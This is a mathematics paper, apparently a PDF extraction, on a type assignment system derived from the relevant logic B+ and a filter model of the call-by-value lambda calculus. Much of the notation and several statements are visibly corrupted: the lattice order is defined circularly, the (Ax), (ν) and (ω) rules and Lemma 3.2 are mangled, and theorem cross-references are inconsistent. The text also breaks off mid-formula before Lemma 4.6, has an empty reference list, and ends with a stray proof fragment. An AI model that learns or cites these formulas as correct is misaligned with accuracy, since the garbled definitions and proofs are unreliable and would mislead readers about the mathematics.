The Lindenbaum algebra of \( B^+ \), i.e. the quotient of \( L \) under \( \sim \), is ordered by the relation \([A]_\sim \leq [B]_\sim \iff [A]_\sim \leq [B]_\sim \) (where \([A]_\sim \) is the equivalence class of \( A \)). As an ordered set it is a distributive lattice, where \([A \land B]_\sim \) and \([A \lor B]_\sim \) are respectively the meet and the join of \([A]_\sim \) and \([B]_\sim \), and \([v]_\sim \) is the top.
Co-prime elements in a lattice, here called \( \lor \)-prime elements, play a role in the representation theorems of distributive lattices. In our setting, \( \lor \)-prime formulæ will turn out to be types of closed terms, \( \beta_\lor \)-convertible with values. We introduce them here and defer the analysis of their connection to values to the next sections.
Definition 2.5 A formula A is $\lor$-prime iff $A \leq B \lor C \Rightarrow A \leq B$ or $A \leq C$.
Theorem 2.6 (Properties of $\lor$-prime formulas)
i) $\lor$ and any propositional variable are $\lor$-prime.
ii) If $m_{\lor}(A) = \lor_{i \in I} A_i$ then $A_i$ is $\lor$-prime, for all $i \in I$.
iii) The formula $\land_{i \in I} (A_i \rightarrow B_i)$ is $\lor$-prime for all (finite) $I$ and formulas $A_i, B_i$.
iv) $B \rightarrow C \not\sim \lor$ for all $B, C$.
v) $\land_{i \in J} (A_i \rightarrow B_i) \leq C \rightarrow D$ and $C$ is $\lor$-prime imply $C \leq \land_{i \in J} A_i$ and $\land_{i \in J} B_i \leq D$ for some $J \subseteq I$.
The proof of Theorem 2.6 is reported in the Appendix. The condition ‘$C$ is $\lor$-prime’ in statement (v) of the above theorem, is necessary. A counter-example is axiom (A8).
3 The type assignment system
Type assignment systems are formal systems deriving statements of the form $M : A$, where $M$ (the subject) is a pure $\lambda$-term and $A$ (the predicate) is a type (here a formula). The intuitive meaning is that types are properties of terms, hence $M : A$ means “$M$ has property $A$”. As $M$ may contain free variables, assumptions about the types of such variables may be used in the derivation, and are collected into bases (also called contexts): $x_1 : A_1, \ldots, x_n : A_n$, which we consider as finite sets of statements (assumptions) such that $x_i \not\equiv x_j$ if $i \neq j$.
Bases are ranged over by $\Gamma$, and we write $\Gamma, x : A$ as abbreviation of $\Gamma \cup \{x : A\}$, under the assumption that $x$ does not occur in $\Gamma$. Then the general form of statements derivable in a type assignment system is $\Gamma \vdash M : A$, meaning “$M$ has type $A$ if the variables in $\Gamma$ have the types listed in $\Gamma$ itself”.
We observe that, although the basic motivation for having bases is to handle the types of the free variables in the subject $M$, it is not the case that, if $\Gamma \vdash M : A$ is derivable, then the subjects of statements in $\Gamma$ are exactly the free variables of $M$. Indeed, on the one hand $\Gamma$ may contain assumptions about variables not occurring free in $M$; on the other hand, because of rule (v), $M$ may contain free variables which are not in $\Gamma$.
Definition 3.1 (The type assignment system)
i) A statement is an expression of the form $M : A$, where $M$ is a term (subject) and $A$ is a type (predicate).
ii) An assumption is a statement whose subject is a term variable.
iii) A basis is a set of assumptions with distinct variables as subjects whose predicates are $\lor$-prime types.
iv) A statement $M : A$ is derivable from a basis $\Gamma$, notation $\Gamma \vdash M : A$, if $\Gamma \vdash M : A$ can be proved using the following axioms and inference rules:
\[(Ax): \frac{\Gamma, x: A \vdash x: A}{\Gamma \vdash M : \nu} \text{ (if } M \text{ is a variable or an abstraction)}\]
\[(\rightarrow I): \frac{\Gamma, x: A \vdash B}{\Gamma \vdash \lambda x. M : A \rightarrow B}\]
\[(\rightarrow E): \frac{\Gamma \vdash M : A \rightarrow B \quad \Gamma \vdash N : A}{\Gamma \vdash MN : B}\]
\[(\land I): \frac{\Gamma \vdash M : A \quad \Gamma \vdash M : B}{\Gamma \vdash M : A \land B}\]
\[(\leq): \frac{\Gamma \vdash M : A}{\Gamma \vdash M : B} (A \leq B)\]
This system differs from that in [2] not just because of the syntax of types and of the definition of the \(\leq\) relation, but also because of the restrictions (3.1(iii) on assumptions and of rule (\(v\)).
If we allow assumptions with predicates which are not \(\lor\)-prime, then typing is not preserved under \(\beta_\nu\)-reduction. In fact, suppose that \(A, B\) and \(C\) are unrelated formulae (distinct propositional variables, say). Then we can deduce both \(x : A \rightarrow C, y : A \land B \vdash xy : C\) and \(x : B \rightarrow C, y : A \land B \vdash xy : C\), hence
\[y : A \land B \vdash \lambda x. xy : ((A \rightarrow C) \rightarrow C) \land ((B \rightarrow C) \rightarrow C) \sim [A \rightarrow C] \lor (B \rightarrow C) \rightarrow C,\]
by rules \((\rightarrow I), (\land I)\) and \((\leq)\). Suppose that we relax the restriction on the assumptions, and consider \(z : (A \rightarrow C) \lor (B \rightarrow C)\). Then by rule \((\rightarrow E)\) and the admissibility of weakening we have:
\[z : (A \rightarrow C) \lor (B \rightarrow C), y : A \land B \vdash (\lambda x. xy)z : C.\]
Now \((\lambda x. xy)z\) \(\beta_\nu\)-reduces to \(zy\), but \(z : (A \rightarrow C) \lor (B \rightarrow C), y : A \land B \not\vdash zy : C\). This is an easy consequence of the Generation Lemma below (Lemma 3.4).
A second remark concerns rule \((v)\). Compared with [2], this rule is close to rule \((\omega)\):
\[(\omega): \frac{\Gamma \vdash M : \omega}{\Gamma \vdash M : \omega}\]
of [2], but for the restriction on the form of \(M\). In fact, in the present system it is not true that any term has a type: a typical un-typeable term is \(\Omega \equiv (\lambda x. xx)(\lambda x. xx)\). As a matter of fact, in our system only terms which are \(\beta_\nu\)-convertible to values have a type in the empty basis, hence (also) type \(\nu\). This is a basic choice: as terms will be discriminated according to the types we can assign to them, the fact that “divergent” closed terms (which are not \(\beta_\nu\)-convertible to a value) have no type will identify all of them.
In contrast, in [2] any term has a type, at least the “universal type” \(\omega\) (trivially) and also type \(\omega \rightarrow \omega\), because of the axiom \(\omega \leq \omega \rightarrow \omega\). Had we introduced here the universal type \(\omega\), serious problems would immediately have arisen. Indeed, one would have, e.g., that \(\vdash (\lambda xy. y)\Omega : A \rightarrow A\). But, once the inequation \(\omega \leq \omega \rightarrow \omega\) has been dropped, we expect, as it happens in all standard models of call-by-value \(\lambda\)-calculus, that arrow types (in the empty basis) characterize terms evaluating to a value (see, e.g. [5]). But then \((\lambda xy. y)\Omega\) should be itself \(\beta_\nu\)-convertible with a value, which is not.
The next lemmas are routine, but essential for the technical development: the essence is that variables can be substituted by terms having the same type, and that, under certain conditions, the rules of the system can be reversed.
Lemma 3.2 (Syntactical properties)
i) (weakening) If \( \Gamma \vdash M : A \) then \( \Gamma, x : B \vdash M : A \).
ii) (thinning) If \( \Gamma \vdash M : A \) then \( \Gamma[M/x \vdash M : A] \), where \( \Gamma[M = \{ x : A \in \Gamma | x \in FV(M) \} \).
iii) (substitution) If \( \Gamma, x : A \vdash M : B \) and \( \Gamma \vdash N : A \) then \( \Gamma \vdash M[N/x] : B \).
Proof: All statements above are proved by induction on derivations. In particular (iii) is proved by induction on the derivation of \( \Gamma, x : A \vdash M : B \). We only observe that, if the last rule is \((v)\), then two cases are possible, according to the form of \( M \):
(iii): Case \( M \equiv y \): if \( y \equiv x \) then \( y[N/x] \equiv N \) and we have, using the hypothesis \( \Gamma \vdash N : A \) and rule \((\leq)\), that \( \Gamma \vdash N : v \); otherwise, if \( y \not\equiv x \) then \( y[N/x] \equiv y \), and \( \Gamma \vdash y : v \) by rule \((v)\).
(ii): Case \( M \equiv \lambda y. M' \): then \( (\lambda y. M')[N/x] \equiv \lambda z. M'[y/z][N/x] \) (where \( z \) is a fresh variable) which is an abstraction; therefore \( \Gamma \vdash M[N/x] : v \) is an instance of rule \((v)\).
When restricting to \( \lor \)-prime formulae, some useful properties concerning the type assign-
ment system clearly reflect properties of natural deduction systems for propositional logic.
Lemma 3.3
i) The following rule is admissible:
\[
(\leq)_L : \frac{\Gamma, x : A \vdash M : B}{\Gamma, x : C \vdash M : B} \quad (C \leq A \text{ and } C \text{ is } \lor\text{-prime})
\]
ii) If \( M : B \) is derived from \( M : A_1 \cdots M : A_n \) only by using rules \((\land I)\) and \((\leq)\), then \( A_1 \land \cdots \land A_n \leq B \).
Proof: (i) By induction on the derivation of \( \Gamma, x : A \vdash M : B \).
(ii) By induction on derivations.
The Generation Lemma allows for a reverse reading of the rules. In particular, it establishes that, if the subject of the conclusion is an application or an abstraction, then, under suitable hypotheses, we have information on types which can be given to its immediate subterms.
Lemma 3.4 (Generation Lemma)
i) If \( \Gamma \vdash x : A \) and \( A \not\sim v \) then, for some \( B, x : B \in \Gamma \) and \( B \leq A \).
ii) \( \Gamma \vdash MN : A \) iff \( \Gamma \vdash M : B \rightarrow A \) and \( \Gamma \vdash N : B \) for some \( B \).
iii) If \( \Gamma \vdash \lambda x. M : A \) and \( A \not\sim v \) then \( \Gamma, x : B_i \vdash M : C_i \) and \( \land_{i \in I} (B_i \rightarrow C_i) \leq A \) for some \( I, B_i, C_i \).
iv) \( \Gamma \vdash \lambda x. M : B \rightarrow C \) and \( B \) is \( \lor\)-prime iff \( \Gamma, x : B \vdash M : C \).
Proof: i) Immediate, by Lemma 3.3 (ii).
ii) \((\Rightarrow)\) By induction on the derivation of \( \Gamma \vdash MN : A \). The only non-trivial case is when the last rule applied is \((\land I)\), i.e. \( A = A_1 \land A_2 \). Then
\[
\frac{\Gamma \vdash M : A_1 \quad \Gamma \vdash M : A_2}{\Gamma \vdash M : A_1 \land A_2} \quad (\land I)
\]
is the last step. By induction, there are \( B_1, B_2 \) such that \( \Gamma \vdash M : B_i \rightarrow A_i, \Gamma \vdash N : B_i \) for
\( i = 1, 2. \) Then
\[
\begin{array}{c}
\Gamma \vdash M : B_1 \rightarrow A_1 \\
\Gamma \vdash M : B_1 \land B_2 \rightarrow A_1 \\
\hline
\Gamma \vdash M : (B_1 \land B_2 \rightarrow A_1) \land (B_1 \land B_2 \rightarrow A_2) \\
\hline
\Gamma \vdash M : B_1 \land B_2 \rightarrow A_1 \land A_2 \\
\end{array}
\]
(\( \leq \)) By rule (\( \rightarrow \)).
\( iii \) The derivation of \( \Gamma \vdash \lambda x. M : A \) (\( A \not\sim \nu \)) has the shape:
\[
\begin{array}{c}
\Gamma, x : B_1 \vdash M : C_1 \\
\Gamma, x : B_1 \vdash M : C_1 \quad \ldots \quad \Gamma, x : B_1 \vdash M : C_n \\
\hline
\Gamma, x : B_1 \vdash \lambda x. M : B_1 \rightarrow C_1 \\
\Gamma, x : B_n \vdash M : C_n \\
\hline
\Gamma \vdash \lambda x. M : A
\end{array}
\]
then by Lemma 3.3 (ii)
\( \land_{i \in I} (B_i \rightarrow C_i) \land \nu \quad \ldots \quad \land \nu \leq A. \)
\( I \not= \emptyset \) because \( A \not\sim \nu \) and \( B_i \rightarrow C_i \leq \nu \) by (A1). Thus
\( \land_{i \in I} (B_i \rightarrow C_i) \leq A. \)
\( iv \) In (ii) above, as \( B \rightarrow C \not\sim \nu \) by Theorem 2.6 (iii), we can assume \( A = B \rightarrow C. \) Thus there exist \( I, B_i, C_i, \)
\( \Gamma, x : B_i \vdash M : C_i, \quad \land_{i \in I} (B_i \rightarrow C_i) \leq B \rightarrow C. \)
Since \( B \) is \( \lor \)-prime, by Theorem 2.6 (iv),
\( \exists J \subseteq I, B \leq \land_{i \in I} B_i \) and \( \land_{i \in J} C_i \leq C \implies \exists J \subseteq I [\forall i \in J, B_i \leq B_i \) and \( \land_{i \in J} C_i \leq C]. \)
Hence we have:
\[
\begin{array}{c}
\Gamma, x : B_i \vdash M : C_i \text{ and } B \leq B_i (\forall i \in J) \quad \text{and } B \text{ is } \lor \text{-prime} \\
\hline
\Gamma, x : B \vdash M : \land_{i \in J} C_i \quad (\land I) \\
\Gamma, x : B \vdash M : C \quad (\leq)
\end{array}
\]
The paper [1] considers a disjunction-elimination rule, which, as such, is not admissible in the present system. However, as in [5], a suitable restriction of it is admissible:
\[
\begin{array}{c}
\Gamma \vdash M, V / x : C \\
\Gamma, x : A \vdash M : C \\
\Gamma, x : B \vdash M : C \\
\hline
\Gamma \vdash V : A \lor B
\end{array}
\]
(V is a variable or an abstraction)
In fact, if \( V \equiv y \) is a variable that does not occur in \( \Gamma \), then \( A \lor B \sim \nu \) (by Lemma 3.4 (i)); since \( \nu \) is \( \lor \)-prime, both \( A, B \sim \nu \), and the thesis follows from the Substitution Lemma (Lemma 3.2 (iii)). If \( y : D \) is in \( \Gamma \) then \( D \) is \( \lor \)-prime and \( D \leq A \lor B \); therefore, by rule (\( \leq \)), either \( \Gamma \vdash y : A \) or \( \Gamma \vdash y : B. \) In both cases, the thesis follows by substitution.
Suppose, instead, that \( V \equiv \lambda y. M \). For \( A \lor B \sim \nu \), we reason as in the previous case. Otherwise, if \( A \lor B \not\sim \nu \), then, by Lemma 3.4 (iii), \( \Gamma, y : D_i \vdash M : E_i \) for \( i \in I \) (for some finite \( I \) and types \( D_i, E_i \)), such that \( \land_{i \in I} (D_i \rightarrow E_i) \leq A \lor B. \) By (\( \rightarrow \)) and (\( \land \)), \( \Gamma \vdash \lambda y. M : \land_{i \in I} (D_i \rightarrow E_i); \) on the other hand, we know that \( \land_{i \in I} (D_i \rightarrow E_i) \) is \( \lor \)-prime by Lemma 2.6 (v), hence either \( \Gamma \vdash \lambda y. M : A \) or \( \Gamma \vdash \lambda y. M : B \), and the result follows by substitution.
The restriction on the form of \( V \) is essential: notice that \( x : C \rightarrow A \lor B, y : C \vdash xy : A \lor B, \) but we cannot type, in the same basis, \( xy \) either by \( A \) or by \( B. \)
4 The call-by-value $\lambda$-calculus and its models
The type assignment system we have introduced does not respect the (unrestricted) $\beta$-rule, as it is the case, instead, for the system of [2]. More precisely, types are preserved neither under $\beta$-reduction, nor under $\beta$-expansion.
For example, one can deduce $(\lambda y. x y y)(u v) : C$ from the basis $\Gamma = \{ x : (A \rightarrow A \rightarrow C) \land (B \rightarrow B \rightarrow C), u : D \rightarrow A \lor B, v : D \}$ as follows:
\[
\begin{align*}
\Gamma \vdash & x : (A \rightarrow A \rightarrow C) \\
\Gamma \vdash & x : A \rightarrow A \\
\Gamma \vdash & y : A \\
\Gamma \vdash & xy : C \\
\Gamma \vdash & \lambda y. xy : A \rightarrow C \\
\Gamma \vdash & \lambda y. xy : B \rightarrow C \\
\Gamma \vdash & \lambda y. xy : (A \rightarrow C) \land (B \rightarrow C) \\
\Gamma \vdash & u : D \rightarrow A \lor B \\
\Gamma \vdash & v : D \\
\Gamma \vdash & (\lambda y. xy)(uv) : C
\end{align*}
\]
One cannot deduce $C$ from $\Gamma$ for the normal form $x(u v)(u v)$. Also one can deduce $A \rightarrow A$ for $\lambda y. y$, but this type cannot be deduced for $(\lambda x y y)((\lambda z. z z)(\lambda z. z z))$, which has no type at all.
Thus this type assignment system does not induce a $\lambda$-model. Instead it gives a model of the call-by-value $\lambda$-calculus. The call-by-value $\lambda$-calculus, as introduced by Plotkin [9], is obtained by restricting the $\beta$-rule to redexes whose argument is a value (i.e. a variable or an abstraction).
Definition 4.1 (Call-by-value $\lambda$-calculus) The set of values $Val \subseteq \Lambda$ is defined by
\[ Val = Var \cup \{ \lambda x. M | M \in \Lambda \} \]
where $Var$ is the set of term variables. The call-by-value $\beta$-reduction rule is
\[
(\beta_v) \ (\lambda x. M) N \rightarrow_v M[N/x] \text{ if } N \in Val.
\]
The contextual, reflexive, symmetric, and transitive closure of $\rightarrow_v$ is denoted by $=_{v}$.
Models of call-by-value $\lambda$-calculus are a generalisation of $\lambda$-models, in which a distinguished subset $\mathcal{V}$ of an applicative structure $\mathcal{D}$ is meant to interpret values: if one takes $\mathcal{V} = D$, the following definition immediately coincides with the notion of syntactical $\lambda$-model of [7]. A slightly different definition can be found in [6]; the present one is from [10].
Definition 4.2 (Models of call-by-value $\lambda$-calculus) A model of call-by-value $\lambda$-calculus is a structure $\mathcal{M} = \langle \mathcal{D}, \mathcal{V}, \cdot, [\cdot]^{\mathcal{M}} \rangle$, such that $\cdot$ is a binary operation on $\mathcal{D}$, called application (i.e. $\cdot$ is an applicative structure), $\mathcal{V} \subseteq \mathcal{D}$ and, for any environment $\rho : \mathcal{V} \rightarrow \mathcal{V}$, $[\cdot]^{\mathcal{M}}$ is a map from $\Lambda$ to $\mathcal{D}$ satisfying (writing simply $[M]_{\rho}$ for $[M]^{\mathcal{M}}_{\rho}$):
i) $[x]_{\rho} = \rho(x)$
ii) $[MN]_{\rho} = [M]_{\rho} \cdot [N]_{\rho}$
iii) $[\lambda x. M]_{\rho} \cdot d = [M]_{\rho[x:=d]}$ if $d \in \mathcal{V}$
iv) $[\forall x \in FV(M), \rho(x) = \rho'(x) \Rightarrow [M]_{\rho} = [M]_{\rho'}$.
v) $[\lambda x. M]_{\rho} = [\lambda y. M[y/x]]_{\rho}$ if $y \notin FV(M)$
vi) $[\forall d \in \mathcal{V}, [M]_{\rho[x:=d]} = [N]_{\rho[x:=d]} \Rightarrow [\lambda x. M]_{\rho} = [\lambda x. N]_{\rho}$
vii) \( M \in \text{Val} \Rightarrow [[M]]_{\rho} \in V \) for all \( \rho \).
The soundness of this definition is proved in [10]: we state this fact in the next lemma.
Lemma 4.3 If \( M =_\rho N \) then \( [[M]]^M_\rho = [[N]]^M_\rho \), for any model \( M \) and environment \( \rho \).
In analogy with [2], we will define a model using the set \( F \) of filters over \( L \), generated by the \( B^+ \) implication \( \leq \). The set of \( \lor \)-prime filters, as suggested by the remark at the end of the previous section, is meant as the set of values. There is, however, a slight mismatch between the present notion of filter and the standard one: we shall admit \( \emptyset \) as an element of \( F \).
As a matter of fact, we shall construct a model of the call-by-value \( \lambda \)-calculus out of the set of filters: the denotation of a term \( M \) is a filter, namely the set of all types (formulae) that can be assigned to \( M \). The fact that the empty set is considered as a filter is a consequence of our choice to use \( \nu \) as the type of values, and of the fact that closed terms which are not \( \beta_\nu \)-convertible to a value have no type at all.
Definition 4.4 (Filters)
i) A filter over \( B^+ \) is a set \( X \subseteq L \) such that
- if \( A \leq B \) and \( A \in X \) then \( B \in X \);
- if \( A, B \in X \), then \( A \land B \in X \).
ii) Let \( F \) be the set of all filters over \( B^+ \).
iii) A filter \( X \) over \( B^+ \) is a \( \lor \)-prime filter if \( A \lor B \in X \) implies either \( A \in X \) or \( B \in X \).
iv) Let \( P F \) be the set of \( \lor \)-prime filters on \( B^+ \) different from \( \emptyset \).
v) If \( X \subseteq L \), \( \uparrow X \) denotes the filter generated by \( X \).
vi) \( \uparrow A \) is short for \( \uparrow \{ A \} \).
\( \langle \mathcal{F}, \subseteq \rangle \) is a distributive lattice. As a domain it is algebraic, with finite (or compact) elements of the shape \( \uparrow A \). Now we observe that \( \uparrow B \) is \( \lor \)-prime if and only if \( B \) is \( \lor \)-prime; since any \( A \) is equivalent to a finite disjunction \( A_1 \lor \cdots \lor A_k \) of \( \lor \)-prime formulae, we conclude that any finite element of \( \mathcal{F} \) (namely any principal filter) factorizes into a finite intersection of \( \lor \)-prime filters: \( \uparrow (A_1 \lor \cdots \lor A_k) = \uparrow A_1 \cap \cdots \cap \uparrow A_k \).
\( \mathcal{F} \) is also a solution of the domain equation
\[ D \triangleleft [D \to \bot D]_{\bot} \]
in the category of algebraic lattices, where \( [D \to \bot D]_{\bot} \) denotes the lifted space of strict continuous functions from \( D \) to \( D \). In fact \( \emptyset \) and \( \uparrow \nu \) are respectively the bottom of \( \mathcal{F} \) and of \( [\mathcal{F} \to \bot \mathcal{F}] \). Moreover \( \uparrow (A \to B) \) represents the strict step function \( f_{\uparrow A, \uparrow B} \), where as usual
\[ f_{a,b}(d) = \text{if } a \sqsubseteq d \text{ then } b \text{ else } \bot. \]
So, we can define the projection pair \( \langle F, G \rangle \), where \( F : \mathcal{F} \to [\mathcal{F} \to \bot \mathcal{F}]_{\bot} \), \( G : [\mathcal{F} \to \bot \mathcal{F}]_{\bot} \to \mathcal{F} \), and \( F \circ G = \text{Id}_{[\mathcal{F} \to \bot \mathcal{F}]_{\bot}} \), as follows:
\[ F(X) = \bigsqcup \{ f_{\uparrow A, \uparrow B} \mid A \to B \in X \} \]
\[ G(f) = \uparrow \{ A \to B \mid B \in f(\uparrow A) \} \cup \uparrow \nu. \]
Due to the presence of union types, we do not have an isomorphism between \( \mathcal{F} \) and \( [\mathcal{F} \to \bot \mathcal{F}]_{\bot} \), since different filters represent the same function. For example, \( \uparrow (A \to B) \lor (C \to D) \sqsubseteq \uparrow A \land C \to B \lor D \) and the inclusion is proper, but \( F(\uparrow (A \to B) \lor (C \to D)) = F(\uparrow \)
Lemma 4.6 i) $X \cdot Y = \{ A \mid \exists B \in Y, B \rightarrow A \in X \}$.
Observe that $X \cdot \emptyset = \emptyset \cdot Y = \emptyset$.
Lemma 4.6 ii) $X \cdot Y \in \mathcal{F}$ for all $X, Y \in \mathcal{F}$.
Proof: i) First $X \cdot Y$ is upward closed: if $A \in X \cdot Y$ and $A \leq B$ then $C \rightarrow A \in X$, for some $C \in Y$. Then, by (R5), $C \rightarrow A \leq C \rightarrow B$, hence $C \rightarrow B \in X$, which is upward closed, so $B \in X \cdot Y$.
We now show that $X \cdot Y$ is closed under $\land$: let $A, B \in X \cdot Y$. By definition, there exist $A', B'$ such that $A', B' \in Y$, $A' \rightarrow A, B' \rightarrow B \in X$. By (R4), $A' \rightarrow A \leq (A' \land B') \rightarrow A$, and, similarly, $B' \rightarrow B \leq (A' \land B') \rightarrow B$. By (A7), $((A' \land B') \rightarrow A) \land ((A' \land B') \rightarrow B) \leq (A' \land B') \rightarrow (A \land B) \in X$, since $X$ is a filter. But $A' \land B' \in Y$, since $Y$ is a filter too, so we conclude that $A \land B \in X \cdot Y$.
ii) $(\Leftarrow)$ Let $A \lor B \in X$, then $C \leq A \lor B$, for some $\lor$-prime $C \in X$. Then immediately $C \leq A$ or $C \leq B$, so $A \in X$ or $B \in X$ since $X$ is upward closed.
$(\Rightarrow)$ By Proposition A.3, $B \sim m_{\lor}(B) = \bigvee_{i \in I} B_i$, where the $B_i$'s are $\lor$-prime by Theorem 2.6 (ii). As $X$ is $\lor$-prime, $B_i \in X$ for some $i \in I$, and clearly $B_i \leq B$.
The basic idea of the next definition is to interpret terms into $\mathcal{F}$ using the Leibnitzian principle for which objects are identified with the set of their properties (here formulae, or types).
Definition 4.7 (Term interpretation)
i) A basis $\Gamma$ agrees with an environment $\rho : \text{Var} \rightarrow \mathcal{P} \mathcal{F}$ (notation $\Gamma \models \rho$) iff $x : B \in \Gamma$ implies $B \in \rho(x)$.
ii) The interpretation of $\lambda$-terms induced by $\vdash$ is defined by
$$[[M]]^\mathcal{F}_\rho = \{ A \in L \mid \exists \Gamma \models \rho, \Gamma \vdash M : A \}.$$
The mapping $[[M]]^\mathcal{F}_\rho$ is actually an interpretation from $\Lambda$ to $\mathcal{F}$, as stated in the next Lemma.
Lemma 4.8 $[[M]]^\mathcal{F}_\rho \in \mathcal{F}$, for any $M \in \Lambda$ and environment $\rho : \text{Var} \rightarrow \mathcal{P} \mathcal{F}$.
Proof: By rules $(\leq)$ and $(\land)$.
The main fact we establish now about $\mathcal{F}$ is that, given the above definitions of application and interpretation, it is a (filter) model of the call-by-value $\lambda$-calculus.
Theorem 4.9 $\mathcal{M}_0 = \langle \mathcal{F}, \mathcal{P} \mathcal{F}, \cdot, [[\cdot]]^\mathcal{F}_\rho \rangle$ is a model of call-by-value $\lambda$-calculus.
Proof: By checking that all conditions of Definition 4.2 are satisfied.
i) If $A \in [[x]]^\mathcal{F}_\rho$, then $\Gamma \vdash x : A$ for some $\Gamma$ such that $\Gamma \models \rho$. If $A \not\equiv \emptyset$ (otherwise the thesis follows from the fact that $\rho(x) \neq \emptyset$) then $x : B \in \Gamma$ for some $B \leq A$, by Lemma 3.4 (i). This implies that $B \in \rho(x)$ and, therefore, also that $A \in \rho(x)$.
On the other hand, if $A \in \rho(x)$, then $\rho \models \{ x : A \}$ and $x : A \vdash x : A$.
10
ii) Immediate by Lemma 3.4 (ii).
iii) Let $X \in \mathcal{P} \mathcal{F}$, then
$$A \in [\lambda x.M]_{\rho}^F \cdot X \Rightarrow \exists B \in X. B \rightarrow A \in [\lambda x.M]_{\rho}^F$$
$$\Rightarrow \exists C \in X. C \land-\text{prime} \& C \rightarrow A \in [\lambda x.M]_{\rho}^F$$
$$\Rightarrow \exists C \in X. \Gamma \land-\text{prime} \& \Gamma \models \rho \& \Gamma \vdash \lambda x.M : C \rightarrow A$$
$$\Rightarrow \exists C \in X. \Gamma. x : C \models \rho[x := X] \& \Gamma, x : C \vdash M : A$$
$$\Rightarrow A \in [M]_{\rho[x := X]}^F$$
Vice versa
$$A \in [M]_{\rho[x := X]}^F \Rightarrow \exists B, \Gamma. \Gamma, x : B \models \rho[x := X] \& \Gamma, x : B \vdash M : A$$
$$\Rightarrow \exists B \in X. \Gamma. \Gamma \models \rho \& \Gamma \vdash \lambda x.M : B \rightarrow A$$
$$\Rightarrow \exists B \in X. B \rightarrow A \in [\lambda x.M]_{\rho}$$
$$\Rightarrow A \in [\lambda x.M]_{\rho} \cdot X.$$
iv) vi), vii) Easy.
vii) If $M \equiv x \in \text{Var}$, then $[M]_{\rho}^F = \rho(x) \in \mathcal{P} \mathcal{F}$, because $\rho$ is a mapping from $\text{Var}$ to $\mathcal{P} \mathcal{F}$. Otherwise, suppose that $M \equiv \lambda x.M'$: then by Lemma 4.6 (ii), it suffices to prove that
$$B \in [\lambda x.M'][\rho] \Rightarrow \exists C \in [\lambda x.M'][\rho]. C \leq B \land C \text{ is } \land-\text{prime}.$$
Assume $B \in [\lambda x.M'][\rho]$, i.e. $\exists \Gamma \models \rho, \Gamma \vdash \lambda x.M' : B$. The case $B \not\sim v$ is trivial; let us suppose that $B \sim v$. By Lemma 3.4 (iii) we have that, for some $I, B_i$ and $C_i$,
$$\forall i \in I. \Gamma, x : B_i \vdash M' : C_i \text{ and } \land_{i \in I} (B_i \rightarrow C_i) \leq B.$$
Then $\land_{i \in I} (B_i \rightarrow C_i) \in [\lambda x.M'][\rho]$ by $(\rightarrow I)$ and $(\land I)$, where $\land_{i \in I} (B_i \rightarrow C_i)$ is $\land$-prime by Theorem 2.6 (ii).
5 Conclusion
The fact that the system $B+$ gives naturally a type assignment system for the call-by-value $\lambda$-calculus is a pleasant surprise. Indeed, something more should be true about our system. First we strongly conjecture that an approximation theorem holds: given the right notion of approximant in the case of call-by-value $\lambda$-calculus (see e.g. [6]), we expect that the set of types that can be assigned to any term is exactly the set of all types that can be assigned to its approximate normal forms. Then some leading ideas of our construction, such as the fact that closed terms which can be typed by $v$ are exactly the convergent “programs”, would have a clear and elegant proof.
There are, however, some open questions. First, we do not have a completeness theorem for the $B+$ based type assignment system along the lines of [2]. A deeper analysis of the correspondence between the filter model construction and the semantics of relevant logics is still on demand, and, we guess, should lead to a better understanding even of the results we presently have.
References
Appendix A Properties of $\leq$
Specialisations of $\leq$ to the sets $T_i$ are now introduced, whose definition exploits the syntactical form of the types in $T_i$.
Definition A.1 $\leq_i \subseteq T_i \times T_i (i = \rightarrow, \forall, \land, \lor, \land, \lor, \land)$ are the least preorders such that
$(\leq_\rightarrow)$: $A \leq_\rightarrow B \iff$ either $A = B$ or $B = \nu$ or $A = A_1 \rightarrow A_2, B = B_1 \rightarrow B_2$ and $B_1 \leq_\land A_1, A_2 \leq_\lor B_2$
$(\leq_\land)$: $\land_{i \in I} A_i \leq_\land \land_{j \in J} B_j$ (where $A_i, B_j \in T_\rightarrow$) $\iff \forall i \exists j \in J, A_i \leq_\rightarrow B_j$
$(\leq_\lor)$: $\lor_{i \in I} A_i \leq_\lor \lor_{j \in J} B_j$ (where $A_i, B_j \in T_\land$) $\iff \forall j \exists i \in I, A_i \leq_\land B_j$
$(\leq_\land)$: $\land_{i \in I} A_i \leq_\land \land_{j \in J} B_j$ (where $A_i, B_j \in T_\lor$) $\iff \forall j \exists i \in I, A_i \leq_\lor B_j$
$(\leq_\land)$: $\lor_{i \in I} A_i \leq_\lor \lor_{j \in J} B_j$ (where $A_i, B_j \in T_\land$) $\iff \forall i \exists j \in J, A_i \leq_\land B_j$.
Lemma A.2 $\leq_i (i = \rightarrow, \forall, \land, \lor, \land, \lor, \land)$ are reflexive and transitive.
Proof: By induction on the definition of $\leq_i$.
The following proposition states that conjunctive/disjunctive normal forms are logically equivalent to their counterimages under $m_{\land\lor}()$ and $m_{\lor\land}()$, and that the specialised relations $\leq_i$ are actually restrictions of $\leq$ to the sets $T_i$ respectively.
Property A.3 For all $A, B \in L$:
i) $A \sim m_{\land\lor}(A) \sim m_{\lor\land}(A)$.
ii) $A, B \in T_i, A \leq_i B \Rightarrow A \leq B$ for $i = \rightarrow, \forall, \land, \lor, \land, \lor, \land$.
iii) $A \leq B \iff m_{\land\lor}(A) \leq_{\land\lor} m_{\lor\land}(B) \iff m_{\lor\land}(A) \leq_{\lor\land} m_{\land\lor}(B)$.
Proof: i) By induction on $A$. E.g. if $A = B \rightarrow C$ then, by induction hypothesis, we have $B \sim m_{\lor\land}(B) = \lor_{i \in I} B_i$ and $C \sim m_{\land\lor}(C) = \land_{j \in J} C_j$, so that, by repeated uses of (A7), (A8), (R4) and (R5) we conclude that
$$B \rightarrow C \sim \lor_{i \in I} B_i \rightarrow \land_{j \in J} C_j \sim \land_{i \in I} \land_{j \in J} (B_i \rightarrow C_j) \sim m_{\land\lor}(B \rightarrow C) = m_{\lor\land}(B \rightarrow C).$$
Proof: i) Let
\[ m_{\land \lor}(A) \leq m_{\land \lor}(B) \Rightarrow \forall j \in J \forall i \in I \forall p \in I_i \exists q \in J_j, A_{ip} \leq B_{jq}, \]
where \( m_{\land \lor}(A) = \land_{i \in I} A_i, m_{\land \lor}(A_i) = \lor_{p \in I_i} A_{ip} \), and \( m_{\land \lor}(B) = \land_{i \in J} B_i, m_{\land \lor}(B_i) = \lor_{q \in J_i} B_{iq} \).
Similarly,
\[ m_{\land \lor}(C) \leq m_{\land \lor}(D) \Rightarrow \forall l \in L \exists k \in K \forall r \in K_k \exists s \in L_l, C_{kr} \leq D_{ls}, \]
